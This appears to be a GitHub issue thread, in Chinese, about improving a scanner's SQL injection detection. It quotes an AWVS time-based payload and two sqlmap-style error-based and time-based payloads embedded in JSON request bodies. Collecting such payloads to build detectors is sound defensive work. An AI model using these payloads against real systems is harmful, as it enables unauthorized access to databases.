提升SQL注入检测能力 #23

chushuai · 2024-07-20T07:50:57Z

awvs会针对referer头和x-Forwarded-For检测
他会针对referer植入一个网址一般是谷歌网址加一堆参数测试

chushuai · 2024-07-20T07:55:04Z

https://portswigger.net/web-security/all-labs

1.使用AWVS扫描出了延时注入。
这个是awvs的payload

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

2.https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors

3.这种协议提交参数的sql注入似乎未识别到。
POST包

chushuai · 2024-07-20T08:06:44Z

支持检测更加复杂的json sql请求注入
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' AND EXTRACTVALUE(9553,CONCAT(0x5c,0x7178707a71,(SELECT (ELT(9553=9553,1))),0x7178706271)) AND 'ubrK'='ubrK"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}

Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload:

{
	"userIds": [
		"n1ddae22de4f74f8993e83c6' RLIKE SLEEP(5) AND 'NkVF'='NkVF"
	],
	"uGroupIds": [],
	"privilegeName": "READER",
	"resourceId": "p7a63bcf493fb49c4959633c",
	"resourceType": "data-source"
}

chushuai self-assigned this Jul 20, 2024

chushuai added the 已上线 Already online label Jul 20, 2024

chushuai changed the title ~~SQL注入检测模块优化~~ 提升SQL注入检测能力 Jul 20, 2024

chushuai added 追求极致 Pursuing the Ultimate and removed 已上线 Already online labels Jul 20, 2024

chushuai added the 已上线 Already online label Oct 30, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

提升SQL注入检测能力 #23

提升SQL注入检测能力 #23

chushuai commented Jul 20, 2024 •

edited

Loading

chushuai commented Jul 20, 2024 •

edited

Loading

chushuai commented Jul 20, 2024

提升SQL注入检测能力 #23

提升SQL注入检测能力 #23

Comments

chushuai commented Jul 20, 2024 • edited Loading

chushuai commented Jul 20, 2024 • edited Loading

chushuai commented Jul 20, 2024

chushuai commented Jul 20, 2024 •

edited

Loading

chushuai commented Jul 20, 2024 •

edited

Loading